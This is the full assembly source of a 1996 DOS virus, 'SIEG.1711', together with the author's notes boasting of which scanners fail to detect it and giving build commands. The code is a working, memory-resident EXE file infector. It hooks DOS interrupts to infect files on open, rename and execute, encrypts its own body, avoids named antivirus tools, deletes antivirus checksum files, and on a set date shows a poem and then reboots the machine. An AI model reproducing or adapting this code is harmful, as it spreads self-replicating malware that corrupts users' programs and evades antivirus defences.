; Virus SIEG.1711 by Evil-E
; -----------------------------------------------------------------------------
;
; Created     : 23.02.1996
;
; Yep, your're right this is a pretty old virii from me. It's a fast .EXE 
; infector. It infects on open, extended open, move/rename and execution of 
; files. The virii knows some AV's like SCAN, TBAV, CLEAN, VSAFE, F-PROT, 
; VIRSTOP, ANTIVIR and avoids to infect them. It also kills checksum files 
; from MSAV. SIEG disables fast infection when F-PROT is run and enables it 
; when it is exit. It doesn't infect EXE-overlays, Windows executeables and 
; PKLITE compressed files.
; 
; The virus includes a very nice payload that is executed on my birthday :-).
; Check it out !
;
; It isn't detected by :
; - AVP Version 3.0 build 129 update: 20.03.1999
; - Dr. Web 4.05b
; 
; It is detected by:
; - F-PROT 3.04a as "could be infected with an unknown virus" :-(
;   (F-PROT seems to have a hell good heuristic engine)
;
; Some comments in the source are in german, thats because I'm pretty lazy.
; On the other hand the VX-Scene has a lot of german speaking freaks nowadays
; (hi Serialkiller).
;
; Compiling instructions:
; tasm sieg /m3
; tlink sieg
;------------------------------------------------------------------------------


P8086
MODEL Tiny

	Virus_Size EQU (Virus_End-Virus_Start)
	MemorySize EQU (Virus_Size/16)+8

	Signature  EQU 000h
	ImgLo      EQU 002h
	ImgHi      EQU 004h
	RelocItems EQU 006h
	HdrSize    EQU 008h
	MinHeap    EQU 00Ah
	MaxHeap    EQU 00Ch
	StartSS    EQU 00Eh
	StartSP    EQU 010h
	Checksum   EQU 012h
	StartIP    EQU 014h
	StartCS    EQU 016h
	Reloc      EQU 018h
	HeaderSize EQU 020h

CODESEG

Virus_Start:
 mov     si,00h                 ; delta offset
 mov     bp,si
 add     bp,offset decode

 cmp     ds:[0],020CDh          ; check for valid PSP
 je      no_tracer
 mov     ah,4ch
 int     21h
no_tracer:

 push    ds
 push    si
 push    es

 push    cs
 pop     ds
 mov     cx,Virus_Size
 shr     cx,1
 add     cx,si
 db      0BAh
 KEY     Dw 0000h
ent:
 sub     ds:[bp],dx           ; fucking lazy encryption engine
 inc     bp
 inc     bp
 loop    Ent
DECODE:

 ; "Are you there" -Call
 mov     ax,09DE3h
 int     21h
 cmp     bl,09Dh
 jne     INSTALL
 jmp     RESIDENT

 ; install into memory
INSTALL:
 mov     ax,es
 dec     ax                      ; get MCB
 mov     ds,ax

 mov     bx,ds:[003h]
 mov     ax,MemorySize
 sub     ds:[012h],ax
 sub     bx,ax
 mov     ah,04ah
 int     21h
 mov     ax,5800h                ; Konzept der Speicherver-
 int     21h                     ; waltung lesen
 push    ax
 mov     bx,2h
 mov     ax,5801h                ; Suche von oben
 push    ax
 int     21h
 mov     bx,MemorySize-1
 mov     ah,48h
 int     21h
 mov     es,ax
 dec     ax
 mov     ds,ax
 mov     word ptr ds:[0001],8
 xor     di,di
 push    cs
 pop     ds
 mov     cx,Virus_Size
 cld
 rep     movsb                   ; copy into mem

 pop     ax                      ; Setze altes Speicherkonzept
 pop     bx
 int     21h

 ;get org. int 21h
 push    es
 pop     ds
 mov     ax,3521h
 int     21h
 mov     word ptr ds:[oldint21+2],es
 mov     word ptr ds:[oldint21],bx

 ;set new int 21h
 mov     ah,025h
 mov     dx,offset newint21  
 int     21h     
 
Resident:
 pop     es
 pop     si
 pop     ds

 mov     ah,02Ah
 int     21h
 cmp     dx,31Eh
 jne     No_Payload             ; my birthday ?
 mov     dx,si
 jmp     message

No_Payload:
 ;restore EXE
 add     si,offset segm
 mov     ax,es
 add     word ptr cs:[si],ax
 add     word ptr cs:[si],010h
 cli
 mov     ax,es
 add     ax,10h
 db      005h
 Stack_seg  dw 0
 mov     ss,ax
 db      0BCh
 SPP     dw 0
 sti

 sub     ax,ax
 xor     bx,bx
 sub     cx,cx
 xor     dx,dx
 sub     di,di
 xor     si,si
 sub     bp,bp
 call    dummy

 db      0EAh
 offs    dw      00000h
 segm    dw      0FFF0h

dummy:
 ret

 Virus_Name db 00,"[SIEG!] by Evil-E",00

; Payload :)
Message:
 push    cs
 pop     ds
 mov     ax,0001h                ; 40x25x16 setzen
 int     10h

 inc     ah
 mov     cx,0ff01h
 int     10h

 mov     ax,0B800h
 mov     es,ax
   
 mov     cx,19
 mov     bx,offset Scr_Ofs
 add     bx,dx
 mov     si,offset poem
 add     si,dx
Write_Poem:
 mov     di,word ptr DS:[BX]
next_z:
 lodsb
 or      al,al
 mov     ah,00
 stosw
 jne     next_z
 add     bx,2
 loop    Write_Poem
 mov     byte ptr es:[1],15
 mov     byte ptr es:[3],15
 mov     byte ptr es:[5],9
 mov     byte ptr es:[7],1
 mov     di,1
 mov     cx,40*25-1
Cycle:
 mov     bx,6
E:
 mov     al,es:[di+bx]
 add     di,2
 mov     es:[di+bx],al
 sub     bx,4
 cmp     bx,-6
 jne     E
 mov     bx,3
lo:
 Mov     DX,3dah
wait1:  
 in      al,dx
 test    al,8h
 jnz     wait1
wait2:  
 in      al,dx
 test    al,8h
 jz      wait2

 dec     bx
 jnz     lo
 sub     di,4
 loop    cycle

 xor     ax,ax           ; wait till keypressed
 int     16h

 mov     ds:[072],1234h  ; Reboot
 db      0EAh
 dw      0000h
 dw      0FFFFh

 Scr_Ofs  DW 024h,0AAh,0F6h,190h,1EAh,238h,280h,328h,372h,3c2h
	  DW 418h,4b8h,506h,5ACh,5F8h,646h,694h,6E2h,73Ah

 poem     Db "SIEG",0
	  Db "Wie oft hoerte ich dich sagen,",0
	  Db "Du wuerdest grosse Dinge wagen. -",0
	  Db "Wann, glaubst du, kommt der grosse Tag,",0
	  Db "Da endet alle Mueh' und Plag,",0
	  Db "Da du zu grossen Taten schreitest",0
	  Db "Und da du selbst dein Schicksal leitest?",0
	  Db "Und wieder ging ein Jahr vorbei,",0
	  Db "Doch nie warst du, mein Freund, dabei,",0
	  Db "Wenn's galt, nun endlich zuzugreifen,",0
	  Db "Damit auch Deine Fruechte reifen!",0
	  Db "Woran es liegt? Erklaer es nur!",0
	  Db "Du hattest Pech? Ach, keine Spur!",0
	  Db "Wie immer, einzig und allein",0
	  Db "Lag's nur an dir, an dir allein.",0
	  Db "Schau nur auf deine Haende bloss -",0
	  Db "Sie liegen schlaff in deinem Schoss",0
	  Db "Statt endlich, endlich doch zu handeln",0
	  Db "Und alles in dir umzuwandeln!",0

NEWINT24:
 Mov     al,03h
 iret

DATEIANFANG:
 mov     ax,00h
DateiEND:
 mov     ah,42h
 xor     cx,cx
 cwd
 int     21h
 ret
DATEIENDE:
 Mov     al,02h
 jmp     dateiend

OLDHANDLER:
 pushf
 call    dword ptr CS:[oldint21]
 Ret

EXEINF:
 mov     ds:[fastBo],0                           ; Fast Infection ON

 ; Speicherbedarf in Paragraphen ndern
 mov     cx,word ptr ds:[header+Maxheap]
 add     word ptr ds:[header+Minheap],MemorySize+2
 mov     ax,word ptr ds:[header+Minheap]
 cmp     ax,cx
 jb      NO_INC
 mov     ds:word ptr [header+Maxheap],ax
No_INC:
 ;Altes  STACK Segment sichern
 mov     ax,word ptr ds:[header+StartSS]
 mov     ds:[stack_seg],ax

 ;Alter SP sichern     
 Mov     ax,word ptr ds:[header+StartSP]
 mov     ds:[spp],ax

 ;Alte Einsprungadresse speichern
 mov     ax, word ptr ds:[header+StartCS] ;CS
 mov     ds:[segm],ax
 mov     ax,word ptr ds:[header+StartIP] ;IP
 mov     ds:[offs],ax

 ; Schon infiziert Flag setzen
 mov     ax,09DE3h
 mov     word ptr ds:[header+Checksum],ax

 ;Gre des Kopfes berechnen
 Mov     si,word ptr ds:[header+HdrSize]
 mov     cl,04h
 shl     si,cl
 mov     ax,sizeax
 mov     dx,sizedx

 ;Kopf von Dateilnge abziehen   +  Neuer CS:IP berechnen
 sub     ax,si
 sbb     dx,0
 mov     cx,010h
 div     cx
 mov     word ptr ds:[header+StartCS],ax
 mov     word ptr ds:[header+StartSS],ax     ; SS = CS
 mov     word ptr ds:[Header+StartIP],dx
 mov     ds:[001],dx

 add     dx,offset OurStack                  ; Stackpointer setzen
 mov     word ptr ds:[header+StartSP],dx

 ; +Virus
 mov     ax,sizeax
 mov     dx,sizedx
 add     ax,Virus_Size
 adc     dx,0h
 mov     cx,200h
 div     cx
 inc     ax
 mov     word ptr ds:[header+ImgLo],dx
 mov     word ptr ds:[header+ImgHi],ax
 RET


NEWINT21:
 cmp     ax,09DE3h                       ; "Are you there" - Call
 jne     NEXT
 mov     bl,09Dh                         
 iret
NEXT:   
 cmp     ax,4B00h                        ; Datei ausfhren
 je      INFIZIERE
 cmp     ah,04ch
 je      FastON
 cmp     cs:[fastBo],0                   ; Wenn F-Prot geladen keine
 jne     No_IN                           ; Fast-Infektion
 cmp     ah,03dh                         ; Datei ffnen
 je      infiziere
 cmp     ah,043h                         ; Dateiatt. ndern
 je      infiziere
 cmp     ah,056h                         ; Datei verschieben
 je      infiziere
 cmp     ah,06Ch                         ; Datei ffnen
 je      Infiziere
NO_IN:
 jmp     dword ptr cs:[oldint21]             ; Alten Handler aufrufen
FastON:
 mov     cs:[fastBO],0
 jmp     No_in
INFIZIERE:
 pushf
 push    ax
 push    bx
 push    cx
 push    dx
 push    si
 push    di
 push    ds
 push    es
 push    bp

 cmp     ah,06Ch
 jne     No_EXTENDED
 mov     dx,si

No_EXTENDED:
 mov     si,dx
No_End:
 lodsb
 cmp     al,"."
 jne     No_End                            

 cmp     ds:[si-5],4353h                    ; "SC" ? - SCAN
 je      E2
 cmp     ds:[si-5],4254h                    ; "TB" ? - TBAV
 je      E2
 cmp     ds:[si-6],4C43h                    ; "CL" ? - CLEAN  
 je      E2
 cmp     ds:[si-6],5356h                    ; "VS" ? - VSAFE
 je      e2
 cmp     ds:[si-7],2D46h                    ; "F-" ? - F-PROT
 je      NO_Fast
 cmp     ds:[si-8],4956h                    ; "VI" ? - VIRSTOP
 je      E2
 cmp     ds:[si-8],4E41h                    ; "AN" ? - Antivir
 je      e2
 cmp     ds:[si],534dh                      ; ".MS" ? - ChecksumDatei
 jne     noCheck
 cmp     ds:[si-2],5453h                    ; "ST.MS" 
 jne     NoCheck
 mov     ah,041h                            ; Kill IT 
 int     21h
 jmp     e2
NoCheck:
 mov     word ptr cs:[D_Off],dx
 mov     word ptr cs:[D_Seg],ds

 mov     di,dx
 xor     dl,dl
 cmp     byte ptr ds:[di+1],':'            ; Ist 2 Zeichen ":"
 jne     KEIN_LAUFWERK
 mov     dl,ds:[di]
 and     dl,01fh                            ; Laufwerknummer ermitteln
KEIN_LAUFWERK:
 mov     ah,036h
 int     21h
 cmp     ax,-1
 jne     DO_EXIST
E2:     
 JMP     ENDE

NO_Fast:
 Mov     cs:[FastBO],0FFh
 jmp     ENDE

DO_EXIST:
 MUL     BX
 MUL     CX
 OR      DX,DX
 JNE     SPACE_OK
 CMP     AX,Virus_Size+256
 JB      ENDE
SPACE_OK:
 ; Alten Int 24h speichern
 mov     ax,3524h                ; Alten INT 24h speichern
 int     21h
 push    bx                      ; Offset von INT 24h auf Stack
 push    es                      ; Segment von Int 24h auf Stack

 push    cs
 pop     ds      

 ; Neuen Int 24h installieren
 mov     ah,025h
 push    ax
 mov     dx,offset Newint24
 int     21h
	
 mov     dx,cs:[D_Off]            ; Offset zum Dateinamen holen
 mov     ds,cs:[D_Seg]
 ; Dateiattribute holen
 MOV     AX,4300h
 call    oldhandler
 push    cx

 ;Dateiattributte lschen+setzen
 mov     ax,4301h
 XOR     CX,CX
 call    oldhandler
 JB      WEITER

 ; Datei ffnen
 Mov     ax,3d02h
 call    oldhandler
 JNB     OK
WEITER:
 ; Alte Dateiattribute setzen
 pop     cx      ; Attr.
 mov     dx,ds:[D_Off]
 mov     ds,ds:[D_Seg]
 MOV     AX,4301h
 call    oldhandler

 pop     ax              ; AX=2524h
 pop     ds
 pop     dx
 int     21h
ENDE:
 pop     bp
 pop     es
 pop     ds
 pop     di
 pop     si
 pop     dx
 pop     cx
 pop     bx
 pop     ax
 popf
 jmp     dword ptr cs:[oldint21]             ; Alten Handler aufrufen

OK:     
 xchg    bx,ax
 push    cs
 pop     ds
 ; Datum+Uhrzeit speichern
 mov     ax,5700h
 int     21h
 push    dx
 push    cx

 ; Gre feststellen
 call    dateiende
 mov     ds:[sizedx],dx
 mov     ds:[sizeax],ax
 mov     si,ax
 mov     di,dx

	; Kopf einlesen
 Call    Dateianfang
 mov     ah,03fh
 mov     cx,headersize
 mov     dx,offset header
 int     21h
 cmp     si,4096                                 ; Datei <= 4096
 jbe     E3

 ; EXE - Datei ?
 cmp     word ptr ds:[header+Signature],05A4Dh
 jne     E3

 ; Schon infiziert ?
 mov     ax,09DE3h
 CMP     AX,word ptr ds:[Header+CHECKSUM]
 je      E3
	
 ; Overlay - Datei ?
 Mov     ax,word ptr ds:[header+ImgHi]
 mov     cx,512
 mul     cx
 add     ax,word ptr ds:[header+ImgLo]
 sub     ax,si
 sbb     dx,di
 jnb     OK2
E3:     
 jmp     E1
OK2:
 ; Windows - EXE Datei ?
 cmp     word ptr ds:[header+Reloc],040h
 jb      No_Win

 ; berprfen ob eine Pklite - Datei
 cmp     word ptr ds:[header+Reloc+6],04b50h
 jne     e1

 No_win:

 CALL    EXEINF

 ; Zustzlichen Speicher anfordern
 push    bx
 mov     ax,5802h                        ; UMB Status holen
 int     21h
 push    ax                              ; speichern
 mov     al,03h
 push    ax
 mov     bx,1                            ; UMB's einbeziehen
 int     21h
 mov     ah,048h
 mov     bx,MemorySize
 int     21h
 mov     bp,ax
 pop     ax
 pop     bx
 pushf
 xor     bh,bh
 int     21h
 popf
 pop     bx
	
 jb      e1

 push    bx
 ;Neuer Kopf schreiben
 Call    Dateianfang
 mov     ah,040h
 mov     cx,headersize
 mov     dx,offset header
 int     21h

 xor     ah,ah
 int     1ah
 or      dx,dx
 jnz     Bigger
 inc     dx
Bigger:
 mov     ds:[key],dx             ; Schlssel Speichern

 Call    Verschluesseln          ; Verschlsseln

 pop     bx

 ;Virus an Dateiende schreiben
 call    dateiende
 push    es
 pop     ds

 mov     ah,040h
 mov     cx,Virus_Size
 xor     dx,dx
 int     21h

 ; Speicher freigeben
 mov     ah,049h
 int     21h

E1:
 ; Datum+Uhrzeit wiederherstellen
 mov     ax,5701h
 pop     cx
 pop     dx
 int     21h

 ; Datei schlieen
 mov     ah,03eh
 int     21h
 JMP     Weiter


Verschluesseln:
 ; Kopieren
 mov     es,bp
 xor     di,di
 xor     si,si
 mov     cx,Virus_Size
 rep     movsb

 ; Verschlsseln
 mov     bp,offset decode
 mov     cx,Virus_Size
 shr     cx,1
 mov     dx,ds:[key]
Ver:
 add     es:[bp],dx
 inc     bp
 inc     bp
 loop    Ver
 ret

VIRUS_END:

 Header     DB Headersize DUP(?)
 d_Off      DW 0
 D_SEG      DW 0
 Oldint21   DD 0
 sizedx     DW 0
 sizeax     DW 0
 IM         DD 0
 FastBo     DB 0
 stackSize          DB 256 Dup(?)
 ourstack:
END
